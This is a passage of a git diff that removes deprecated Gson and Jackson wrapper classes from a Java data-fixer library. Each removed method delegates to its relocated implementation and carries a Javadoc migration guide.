- * - * @param value the JSON object to modify; must not be {@code null} - * @param key the key of the field to remove; must not be {@code null} - * @return a new {@link JsonObject} without the specified field - */ - @NotNull - @Override - public JsonElement remove(@NotNull final JsonElement value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.remove(value, key); - } - - /** - * {@inheritDoc} - * - *

Checks whether a JSON object contains a field with the specified key. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#has(JsonElement, String)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @param key the key to look for; must not be {@code null} - * @return {@code true} if the value is a {@link JsonObject} and contains the specified key, - * {@code false} otherwise - */ - @Override - public boolean has(@NotNull final JsonElement value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.has(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON object from a stream of key-value pairs. - * Keys must be JSON string primitives; non-string keys are skipped. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createMap(Stream)} method.

- * - * @param entries the stream of key-value pairs; must not be {@code null} - * @return a new {@link JsonObject} containing all valid entries from the stream - */ - @NotNull - @Override - public JsonElement createMap(@NotNull final Stream> entries) { - Preconditions.checkNotNull(entries, "entries must not be null"); - return this.baseOps.createMap(entries); - } - - /** - * {@inheritDoc} - * - *

Extracts the entries of a JSON object as a stream of key-value pairs. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getMapEntries(JsonElement)} method.

- * - * @param input the JSON element to extract entries from; must not be {@code null} - * @return a {@link DataResult} containing a stream of key-value pairs on success, - * or an error if the input is not a JSON object - */ - @NotNull - @Override - public DataResult>> getMapEntries(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getMapEntries(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object by adding a key-value pair to an existing map. - * A deep copy of the input map is created with the new entry added. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement, JsonElement)} method.

- * - * @param map the existing JSON object; must not be {@code null} - * @param key the key for the new entry (must be a JSON string); must not be {@code null} - * @param value the value for the new entry; must not be {@code null} - * @return a {@link DataResult} containing the new object with the added entry on success, - * or an error if the map is not a JSON object or the key is not a string - */ - @NotNull - @Override - public DataResult mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement key, @NotNull final JsonElement value) { - Preconditions.checkNotNull(map, "map must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToMap(map, key, value); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object by merging two maps together. - * A deep copy of the first map is created, and all entries from the second map are added. - * Entries in the second map override entries with the same key in the first map. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement)} method.

- * - * @param map the base JSON object; must not be {@code null} - * @param other the JSON object to merge from; must not be {@code null} - * @return a {@link DataResult} containing the merged object on success, - * or an error if either argument is not a JSON object - */ - @NotNull - @Override - public DataResult mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement other) { - Preconditions.checkNotNull(map, "map must not be null"); - Preconditions.checkNotNull(other, "other must not be null"); - return this.baseOps.mergeToMap(map, other); - } - - // ==================== Conversion ==================== - - /** - * {@inheritDoc} - * - *

Converts data from another {@link DynamicOps} format to Gson's {@link JsonElement}. - * Recursively converts primitives, lists, and maps to their Gson equivalents. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#convertTo(DynamicOps, Object)} method.

- * - * @param the type parameter of the target format - * @param ops the target {@link DynamicOps} implementation; must not be {@code null} - * @param input the data to convert in the source format; must not be {@code null} - * @return the converted data as a Gson {@link JsonElement} - */ - @NotNull - @Override - public JsonElement convertTo(@NotNull final DynamicOps ops, @NotNull final U input) { - Preconditions.checkNotNull(ops, "ops must not be null"); - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.convertTo(ops, input); - } - - /** - * Returns a string representation of this deprecated wrapper. - * - *

The returned string clearly indicates that this is a deprecated wrapper - * class and suggests using the new implementation instead.

- * - * @return a descriptive string indicating deprecated status and the recommended alternative - */ - @Override - public String toString() { - return "GsonOps (deprecated, use de.splatgames.aether.datafixers.codec.json.gson.GsonOps)"; - } -} diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java deleted file mode 100644 index c937d27..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java +++ /dev/null @@ -1,110 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. - */ - -/** - * DEPRECATED: Legacy package for Gson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps} - * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0. - * - *

- * <p>This package contains the original {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class
- * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their
- * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.gson} package.</p>
- *
- * <h2>Migration Guide</h2>
- *
- * <p>To migrate from this deprecated package to the new package structure:</p>
- *
- * <h3>Import Changes</h3>
- *
- * <pre>{@code
- * // Old import (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.gson.GsonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
- * }</pre>
- *
- * <h3>Code Changes</h3>
- *
- * <p>No code changes are required beyond updating imports. The API is identical:</p>
- *
- * <pre>{@code
- * // This code works with both old and new imports
- * GsonOps ops = GsonOps.INSTANCE;
- * Dynamic<JsonElement> dynamic = new Dynamic<>(ops, jsonElement);
- * }</pre>
- *
- * <h2>Deprecation Timeline</h2>
- *
- * <table border="1">
- *   <caption>Deprecation and Removal Schedule</caption>
- *   <tr><th>Version</th><th>Status</th><th>Action Required</th></tr>
- *   <tr><td>0.4.0</td><td>Deprecated</td><td>Update imports to new package; old code continues to work</td></tr>
- *   <tr><td>0.5.0</td><td>Deprecated</td><td>Warnings during compilation; functionality unchanged</td></tr>
- *   <tr><td>1.0.0</td><td>Removed</td><td>Package deleted; migration required before upgrade</td></tr>
- * </table>
- *

- * <h2>Why This Change?</h2>
- *
- * <p>The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:</p>
- *
- * <ul>
- *   <li><b>Format-Based Organization:</b> All JSON implementations are now grouped under
- *       {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.</li>
- *   <li><b>Library-Based Subpackages:</b> Each format has subpackages for different
- *       libraries (e.g., {@code json.gson}, {@code json.jackson})</li>
- *   <li><b>Consistent Naming:</b> The new structure makes it easier to find and choose
- *       the right implementation for your needs</li>
- * </ul>
- *

- * <h2>New Package Structure</h2>
- *
- * <pre>
- * de.splatgames.aether.datafixers.codec
- * ├── json
- * │   ├── gson/GsonOps.java         (new location)
- * │   └── jackson/JacksonJsonOps.java
- * ├── yaml
- * │   ├── jackson/JacksonYamlOps.java
- * │   └── snakeyaml/SnakeYamlOps.java
- * ├── toml
- * │   └── jackson/JacksonTomlOps.java
- * └── xml
- *     └── jackson/JacksonXmlOps.java
- * </pre>
- *

- * <h2>Delegation Pattern</h2>
- *
- * <p>The deprecated {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class uses the
- * delegation pattern to forward all method calls to the new
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} implementation
- * (see the sketch after this list). This ensures:</p>
- *
- * <ul>
- *   <li>Identical behavior between deprecated and new implementations</li>
- *   <li>Bug fixes applied to the new implementation automatically benefit deprecated users</li>
- *   <li>No performance overhead beyond a single method delegation</li>
- * </ul>
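- *
- * <p>Schematically, the forwarding idiom looks like this (a simplified sketch of
- * the idiom used by the wrapper, not its verbatim class body):</p>
- *
- * <pre>{@code
- * // Every operation forwards unchanged to the relocated implementation.
- * public JsonElement createString(String value) {
- *     return this.baseOps.createString(value);
- * }
- * }</pre>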

- * <h2>Thread Safety</h2>
- *
- * <p>All classes in this deprecated package maintain the same thread-safety guarantees as their
- * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.gson.GsonOps#INSTANCE}
- * can be safely shared across multiple threads.</p>
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
- * @see de.splatgames.aether.datafixers.codec.json
- * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.gson}
- *             instead. This package will be removed in version 1.0.0.
- */
-@Deprecated(since = "0.4.0", forRemoval = true)
-package de.splatgames.aether.datafixers.codec.gson;
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
deleted file mode 100644
index 886fdaf..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
+++ /dev/null
@@ -1,767 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-package de.splatgames.aether.datafixers.codec.jackson;
-
-import com.fasterxml.jackson.databind.JsonNode;
-import com.fasterxml.jackson.databind.ObjectMapper;
-import com.fasterxml.jackson.databind.node.ArrayNode;
-import com.fasterxml.jackson.databind.node.NullNode;
-import com.fasterxml.jackson.databind.node.ObjectNode;
-import com.google.common.base.Preconditions;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
-import de.splatgames.aether.datafixers.api.result.DataResult;
-import de.splatgames.aether.datafixers.api.util.Pair;
-import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
-import org.jetbrains.annotations.NotNull;
-import org.jetbrains.annotations.Nullable;
-
-import java.util.stream.Stream;
-
-/**
- * Backwards-compatibility wrapper for {@link JacksonJsonOps}.
- *
- * <p>This class provides API compatibility for code written against the pre-0.4.0 package structure.
- * It delegates all operations to the new {@link JacksonJsonOps} implementation in the reorganized
- * package hierarchy.</p>
- *
- * <h2>Migration Guide</h2>
- *
- * <p>To migrate to the new API, update your imports and class references:</p>
- *
- * <pre>{@code
- * // Old import (deprecated)
- * import de.splatgames.aether.datafixers.codec.jackson.JacksonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
- *
- * // Old usage (deprecated)
- * JacksonOps ops = JacksonOps.INSTANCE;
- * JacksonOps customOps = new JacksonOps(customMapper);
- *
- * // New usage (recommended)
- * JacksonJsonOps ops = JacksonJsonOps.INSTANCE;
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * }</pre>
- *
- * <h2>Removal Timeline</h2>
- *
- * <p>This class is scheduled for removal in version 1.0.0. All functionality remains
- * fully operational until removal, but users should migrate to the new package structure
- * and class name at their earliest convenience.</p>
- *
- * <h2>Delegation Pattern</h2>
- *
- * <p>This wrapper implements the delegation pattern, forwarding all method calls to the
- * underlying {@link JacksonJsonOps} instance. This ensures identical behavior between
- * the deprecated and new implementations.</p>
- *
- * <h2>Thread Safety</h2>
- *
- * <p>This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared
- * across multiple threads, as the underlying implementation is also thread-safe.
- * Custom instances created with a custom {@link ObjectMapper} are thread-safe if
- * the provided mapper is thread-safe.</p>

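- *
- * <p>For example (a sketch mirroring the constructor documentation further below;
- * {@code DeserializationFeature} is Jackson's standard configuration enum):</p>
- *
- * <pre>{@code
- * // A pre-configured, effectively immutable mapper keeps the wrapper thread-safe.
- * ObjectMapper mapper = new ObjectMapper()
- *     .configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
- * JacksonOps ops = new JacksonOps(mapper);
- * }</pre>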
- *
- * @author Erik Pförtner
- * @see JacksonJsonOps
- * @see DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use {@link JacksonJsonOps} from the {@code codec.json.jackson}
- *             package instead. This class will be removed in version 1.0.0 as part of
- *             the package reorganization.
- */
-@Deprecated(forRemoval = true, since = "0.4.0")
-public class JacksonOps implements DynamicOps<JsonNode> {
-
-    /**
-     * The singleton instance of the deprecated {@code JacksonOps} wrapper.
-     *
-     * <p>This instance wraps {@link JacksonJsonOps#INSTANCE} and provides full backwards
-     * compatibility. It uses a default {@link ObjectMapper} with standard configuration.
-     * The instance is thread-safe and can be shared across the entire application.</p>
-     *
-     * <h2>Migration</h2>
-     *
-     * <p>Replace usages with:</p>
-     *
-     * <pre>{@code
-     * // Old usage (deprecated)
-     * JacksonOps.INSTANCE
-     *
-     * // New usage (recommended)
-     * JacksonJsonOps.INSTANCE
-     * }</pre>
-     *
-     * @deprecated Use {@link JacksonJsonOps#INSTANCE} instead.
-     */
-    @Deprecated(forRemoval = true, since = "0.4.0")
-    public static final JacksonOps INSTANCE = new JacksonOps(JacksonJsonOps.INSTANCE);
-
-    /**
-     * The underlying {@link JacksonJsonOps} instance to which all operations are delegated.
-     *
-     * <p>This field holds the actual implementation that performs all DynamicOps operations.
-     * The wrapper simply forwards all method calls to this instance, ensuring behavioral
-     * equivalence between the deprecated and new implementations.</p>
-     */
-    private final JacksonJsonOps baseOps;
-
-    /**
-     * Creates a new deprecated {@code JacksonOps} wrapper delegating to the specified base implementation.
-     *
-     * <p>This constructor allows wrapping any {@link JacksonJsonOps} instance, enabling use
-     * of custom configurations while maintaining backwards compatibility.</p>
-     *
-     * <h2>Usage</h2>
-     *
-     * <pre>{@code
-     * // Typically use the singleton instead
-     * JacksonOps ops = JacksonOps.INSTANCE;
-     *
-     * // Or wrap a custom JacksonJsonOps instance
-     * JacksonJsonOps customJsonOps = new JacksonJsonOps(customMapper);
-     * JacksonOps customOps = new JacksonOps(customJsonOps);
-     * }</pre>
-     *
-     * @param baseOps the base {@link JacksonJsonOps} instance to delegate all operations to;
-     *                must not be {@code null}
-     * @deprecated Use {@link JacksonJsonOps} directly instead.
-     */
-    @Deprecated(forRemoval = true, since = "0.4.0")
-    private JacksonOps(@NotNull final JacksonJsonOps baseOps) {
-        Preconditions.checkNotNull(baseOps, "baseOps must not be null");
-        this.baseOps = baseOps;
-    }
-
-    /**
-     * Creates a new deprecated {@code JacksonOps} with the specified {@link ObjectMapper}.
-     *
-     * <p>This constructor provides backwards compatibility for code that creates custom
-     * {@code JacksonOps} instances with a specific mapper configuration.</p>
-     *
-     * <h2>Usage</h2>
-     *
-     * <pre>{@code
-     * // Old usage (deprecated)
-     * ObjectMapper customMapper = new ObjectMapper()
-     *     .configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
-     * JacksonOps customOps = new JacksonOps(customMapper);
-     *
-     * // New usage (recommended)
-     * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
-     * }</pre>
-     *
-     * @param mapper the {@link ObjectMapper} to use for JSON operations; must not be {@code null}
-     * @deprecated Use {@link JacksonJsonOps#JacksonJsonOps(ObjectMapper)} instead.
-     */
-    @Deprecated(forRemoval = true, since = "0.4.0")
-    public JacksonOps(@NotNull final ObjectMapper mapper) {
-        Preconditions.checkNotNull(mapper, "mapper must not be null");
-        this.baseOps = new JacksonJsonOps(mapper);
-    }
-
-    /**
-     * Returns the {@link ObjectMapper} used by this instance.
-     *
-     * <p>This method provides access to the underlying Jackson mapper, which can be
-     * useful for advanced configuration or direct JSON serialization/deserialization.</p>
-     *
-     * <h2>Migration</h2>
-     *
-     * <pre>{@code
-     * // Old usage (deprecated)
-     * ObjectMapper mapper = jacksonOps.mapper();
-     *
-     * // New usage (recommended)
-     * ObjectMapper mapper = jacksonJsonOps.mapper();
-     * }</pre>
-     *
-     * @return the {@link ObjectMapper} used by the underlying {@link JacksonJsonOps} instance
-     * @deprecated Use {@link JacksonJsonOps#mapper()} instead.
-     */
-    @Deprecated(forRemoval = true, since = "0.4.0")
-    public ObjectMapper mapper() {
-        return this.baseOps.mapper();
-    }
-
-    // ==================== Empty/Null Values ====================
-
-    /**
-     * {@inheritDoc}
-     *

Returns the canonical empty/null representation for Jackson JSON data, - * which is {@link NullNode#getInstance()}. This delegates to the underlying - * {@link JacksonJsonOps#empty()} method.

- * - * @return {@link NullNode#getInstance()} representing the absence of a value - */ - @NotNull - @Override - public JsonNode empty() { - return this.baseOps.empty(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON object ({@code {}}). This delegates to the underlying - * {@link JacksonJsonOps#emptyMap()} method.

- * - * @return a new empty {@link ObjectNode} instance - */ - @NotNull - @Override - public JsonNode emptyMap() { - return this.baseOps.emptyMap(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON array ({@code []}). This delegates to the underlying - * {@link JacksonJsonOps#emptyList()} method.

- * - * @return a new empty {@link ArrayNode} instance - */ - @NotNull - @Override - public JsonNode emptyList() { - return this.baseOps.emptyList(); - } - - // ==================== Type Checking ==================== - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a map/object structure. - * This delegates to the underlying {@link JacksonJsonOps#isMap(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is an {@link ObjectNode}, {@code false} otherwise - */ - @Override - public boolean isMap(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isMap(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a list/array structure. - * This delegates to the underlying {@link JacksonJsonOps#isList(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is an {@link ArrayNode}, {@code false} otherwise - */ - @Override - public boolean isList(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isList(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a text/string node. - * This delegates to the underlying {@link JacksonJsonOps#isString(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is a text node, {@code false} otherwise - */ - @Override - public boolean isString(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isString(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a numeric node. - * This delegates to the underlying {@link JacksonJsonOps#isNumber(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is a numeric node, {@code false} otherwise - */ - @Override - public boolean isNumber(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isNumber(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a boolean node. - * This delegates to the underlying {@link JacksonJsonOps#isBoolean(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is a boolean node, {@code false} otherwise - */ - @Override - public boolean isBoolean(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isBoolean(value); - } - - // ==================== Primitive Creation ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON text node from the given string value. - * This delegates to the underlying {@link JacksonJsonOps#createString(String)} method.

- * - * @param value the string value to wrap; must not be {@code null} - * @return a new text node containing the string - */ - @NotNull - @Override - public JsonNode createString(@NotNull final String value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createString(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given integer value. - * This delegates to the underlying {@link JacksonJsonOps#createInt(int)} method.

- * - * @param value the integer value to wrap - * @return a new int node containing the integer - */ - @NotNull - @Override - public JsonNode createInt(final int value) { - return this.baseOps.createInt(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given long value. - * This delegates to the underlying {@link JacksonJsonOps#createLong(long)} method.

- * - * @param value the long value to wrap - * @return a new long node containing the long - */ - @NotNull - @Override - public JsonNode createLong(final long value) { - return this.baseOps.createLong(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given float value. - * This delegates to the underlying {@link JacksonJsonOps#createFloat(float)} method.

- * - * @param value the float value to wrap - * @return a new float node containing the float - */ - @NotNull - @Override - public JsonNode createFloat(final float value) { - return this.baseOps.createFloat(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given double value. - * This delegates to the underlying {@link JacksonJsonOps#createDouble(double)} method.

- * - * @param value the double value to wrap - * @return a new double node containing the double - */ - @NotNull - @Override - public JsonNode createDouble(final double value) { - return this.baseOps.createDouble(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given byte value. - * Since JSON has no distinct byte type, the value is stored as a short node. - * This delegates to the underlying {@link JacksonJsonOps#createByte(byte)} method.

- * - * @param value the byte value to wrap - * @return a new short node containing the byte value - */ - @NotNull - @Override - public JsonNode createByte(final byte value) { - return this.baseOps.createByte(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given short value. - * This delegates to the underlying {@link JacksonJsonOps#createShort(short)} method.

- * - * @param value the short value to wrap - * @return a new short node containing the short - */ - @NotNull - @Override - public JsonNode createShort(final short value) { - return this.baseOps.createShort(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON boolean node from the given boolean value. - * This delegates to the underlying {@link JacksonJsonOps#createBoolean(boolean)} method.

- * - * @param value the boolean value to wrap - * @return a new boolean node containing the boolean - */ - @NotNull - @Override - public JsonNode createBoolean(final boolean value) { - return this.baseOps.createBoolean(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given {@link Number} value. - * The specific numeric type is preserved in the underlying JSON representation. - * This delegates to the underlying {@link JacksonJsonOps#createNumeric(Number)} method.

- * - * @param value the number value to wrap; must not be {@code null} - * @return a new numeric node containing the number - */ - @NotNull - @Override - public JsonNode createNumeric(@NotNull final Number value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createNumeric(value); - } - - // ==================== Primitive Reading ==================== - - /** - * {@inheritDoc} - * - *

Extracts the string value from a JSON node. The node must be a text node. - * This delegates to the underlying {@link JacksonJsonOps#getStringValue(JsonNode)} method.

- * - * @param input the JSON node to extract the string from; must not be {@code null} - * @return a {@link DataResult} containing the string value on success, - * or an error if the node is not a text node - */ - @NotNull - @Override - public DataResult getStringValue(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getStringValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the numeric value from a JSON node. The node must be a numeric node. - * This delegates to the underlying {@link JacksonJsonOps#getNumberValue(JsonNode)} method.

- * - * @param input the JSON node to extract the number from; must not be {@code null} - * @return a {@link DataResult} containing the {@link Number} value on success, - * or an error if the node is not a numeric node - */ - @NotNull - @Override - public DataResult getNumberValue(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getNumberValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the boolean value from a JSON node. The node must be a boolean node. - * This delegates to the underlying {@link JacksonJsonOps#getBooleanValue(JsonNode)} method.

- * - * @param input the JSON node to extract the boolean from; must not be {@code null} - * @return a {@link DataResult} containing the boolean value on success, - * or an error if the node is not a boolean node - */ - @NotNull - @Override - public DataResult getBooleanValue(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getBooleanValue(input); - } - - // ==================== List Operations ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON array node from a stream of JSON nodes. - * This delegates to the underlying {@link JacksonJsonOps#createList(Stream)} method.

- * - * @param values the stream of JSON nodes to include in the array; must not be {@code null} - * @return a new {@link ArrayNode} containing all elements from the stream - */ - @NotNull - @Override - public JsonNode createList(@NotNull final Stream values) { - Preconditions.checkNotNull(values, "values must not be null"); - return this.baseOps.createList(values); - } - - /** - * {@inheritDoc} - * - *

Extracts the elements of a JSON array as a stream. The input must be an - * {@link ArrayNode}. This delegates to the underlying - * {@link JacksonJsonOps#getList(JsonNode)} method.

- * - * @param input the JSON node to extract list elements from; must not be {@code null} - * @return a {@link DataResult} containing a stream of the array elements on success, - * or an error if the input is not an array node - */ - @NotNull - @Override - public DataResult> getList(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getList(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON array by appending a value to an existing array. - * The original array is not modified; a deep copy is created. - * This delegates to the underlying - * {@link JacksonJsonOps#mergeToList(JsonNode, JsonNode)} method.

- * - * @param list the existing JSON array to append to; must not be {@code null} - * @param value the JSON node to append; must not be {@code null} - * @return a {@link DataResult} containing the new array with the appended value on success, - * or an error if the list is not an array node - */ - @NotNull - @Override - public DataResult mergeToList(@NotNull final JsonNode list, @NotNull final JsonNode value) { - Preconditions.checkNotNull(list, "list must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToList(list, value); - } - - // ==================== Map Operations ==================== - - /** - * {@inheritDoc} - * - *

Retrieves the value associated with a key from a JSON object. - * This delegates to the underlying {@link JacksonJsonOps#get(JsonNode, String)} method.

- * - * @param value the JSON object to retrieve from; must not be {@code null} - * @param key the key to look up; must not be {@code null} - * @return the JSON node associated with the key, or {@code null} if not present - * or if the input is not an object node - */ - @Override - public @Nullable JsonNode get(@NotNull final JsonNode value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.get(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field set to the specified value. - * If the input is an object node, a deep copy is created with the field updated. - * If the input is not an object node, a new object is created containing only the specified field. - * This delegates to the underlying - * {@link JacksonJsonOps#set(JsonNode, String, JsonNode)} method.

- * - * @param value the JSON node to modify; must not be {@code null} - * @param key the key for the field to set; must not be {@code null} - * @param newValue the value to associate with the key; must not be {@code null} - * @return a new {@link ObjectNode} with the field set to the specified value - */ - @NotNull - @Override - public JsonNode set(@NotNull final JsonNode value, @NotNull final String key, @NotNull final JsonNode newValue) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.set(value, key, newValue); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field removed. - * A deep copy of the input object is created without the specified field. - * This delegates to the underlying - * {@link JacksonJsonOps#remove(JsonNode, String)} method.

- * - * @param value the JSON object to modify; must not be {@code null} - * @param key the key of the field to remove; must not be {@code null} - * @return a new {@link ObjectNode} without the specified field - */ - @NotNull - @Override - public JsonNode remove(@NotNull final JsonNode value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.remove(value, key); - } - - /** - * {@inheritDoc} - * - *

Checks whether a JSON object contains a field with the specified key. - * This delegates to the underlying - * {@link JacksonJsonOps#has(JsonNode, String)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @param key the key to look for; must not be {@code null} - * @return {@code true} if the value is an {@link ObjectNode} and contains the specified key, - * {@code false} otherwise - */ - @Override - public boolean has(@NotNull final JsonNode value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.has(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON object from a stream of key-value pairs. - * Keys must be text nodes; non-text keys are skipped. - * This delegates to the underlying {@link JacksonJsonOps#createMap(Stream)} method.

